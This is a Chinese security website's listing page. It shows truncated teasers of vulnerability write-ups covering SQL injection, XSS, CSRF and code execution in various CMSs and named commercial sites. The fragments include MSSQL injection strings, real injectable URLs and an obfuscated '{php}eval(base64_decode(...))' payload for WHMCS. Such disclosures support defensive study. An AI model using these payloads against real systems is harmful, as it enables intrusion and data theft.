mssql暴表暴列 - 网站安全 - 自学php关注热度:10

注入点：id=1and user0 //得到数据库用户名having 1=1-- //得到当前用户的数据信息，类似于aaa.bbb的格式，aaa是表名，bbb是列名。group by 用户信息having 1=1-- //继续得到一个列。group by 信息1，...[详情]

Traq <= 2.3认证绕过/远程代码执行缺陷及修复关注热度:18

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for mor.....[详情]

迅雷游戏四国军棋布局作弊漏洞及修复 - 网站安关注热度:22

简要描述：迅雷游戏四国军棋导入布局时未对布局文件进行检查，布局时可以通过调入经过修改的布局文件实现棋子在任意位置摆放，如：炸弹摆在第一行，地雷摆到前四行。详细说明..[详情]

万网建站平台存储型XSS - 网站安全 - 自学php关注热度:14

简要描述：未对搜索输出内容进行转义,导致构造的畸形文件名插入JS代码详细说明：1.访问地址:http://try5.mynet.cn/trial/login.aspx生成网站2.在首页- 信息发布- 文章管理- 新建文章 添加文章标..[详情]

酷我音乐分站注入漏洞及修复 - 网站安全 - 自学关注热度:11

http://shouji.kuwo.cn/mobile/wap/Series?id=8修复方案：过滤，你懂的作者Jacks..[详情]

Pixie v1.04 blog post CSRF - 网站安全 - 自学php关注热度:20

前文：http://www.2cto.com/Article/201111/111130.html标题: Pixie v1.04 blog post CSRF作者: hackme下载地址http://pixie-cms.googlecode.com/files/pixie_v1.04.zip影响版本: 1.04# Tested on: Li.....[详情]

Wordpress插件UPM-POLLS 1.0.4盲注及修复 - 网站安全关注热度:8

前文：http://www.2cto.com/Article/201108/99254.html标题: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4作者: Saif El-Sherei www.2cto.com下载地址: http://downloads.wordpress.org/pl.....[详情]

魔方网络摄影系统注入漏洞及利用和修复 - 网站关注热度:13

魔方网络摄影系统注入点：www.2cto.com /news.php?action=detailid=[SQLi]利用方法，第一步通过注入点获取管理员账号和密码，密码居然是明文的第二步，后台地址为/admin.php,进去管理后台试图拿..[详情]

新点软件 asp.net 漏洞小分析 - 网站安全 - 自学p关注热度:14

漏洞比较鸡肋，如果网站没有关闭会员注册的话是可以利用的，(主站fckeditor漏洞已补) www.xxxx.com/会员路径/ 注册后登陆，点击编辑添加信息（附件添加上传无法利用）添加信息后，点击..[详情]

PHPSou开源搜索系统0Day及修复 - 网站安全 - 自学关注热度:11

1 漏洞描述是一套开源搜索引擎系统，官方论坛为：www.phpsou.net,简单介绍如下：PHPSou垂直搜索引擎采用PHP+Mysql开发，是国内首款基于开源底层脚本语言开发的搜索引擎系统。我们在审核..[详情]

基于DOM-XSS检测原理讲解 - 网站安全 - 自学php关注热度:13

对某网站进行XSS检测过程发现多个搜索页面调用同一函数,这些变量大部分都存在着过滤不严格的问题#65377;大部分都是比较典型的XSS,对于典型XSS检测本站的大牛们在之前已经讲解的十分..[详情]

Xoops 2.5.4盲注及修复 - 网站安全 - 自学php关注热度:7

------------------------------------------# Xoops 2.5.4 Blind SQL Injection------------------------------------------下载地址: http://sourceforge.net/projects/xoops/作者: blkhtc0rp www.2ct.....[详情]

whmcs主机管理系统0day及修复 - 网站安全 - 自学p关注热度:13

先注册个id提交一个ticket如下{php}eval(base64_decode(#39;JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWR.....[详情]

DiyPage8.3 orderby注入和代码执行漏洞及修复 - 网站关注热度:33

mod\dpcms\js\searchsubmit.php第36行$srchorder= $_GET[#39;srchorder#39;] ? $_GET[#39;srchorder#39;] : #39;eid#39;;第52行 $sql=#39;SELECT eid,builddate,title,author,content#39;; $sql.....[详情]

京东商场某分站SQL注射及修复方案 - 网站安全关注热度:14

详细说明：补丁不及时，京东论坛出现SQL注射。http://bbs.360buy.com/通过欺骗，GetShell等分析，可能渗透取得用户帐号信息。Discuz1.5-2.0二次注入细节 www.2cto.com在发表回复的地方输入注入语句..[详情]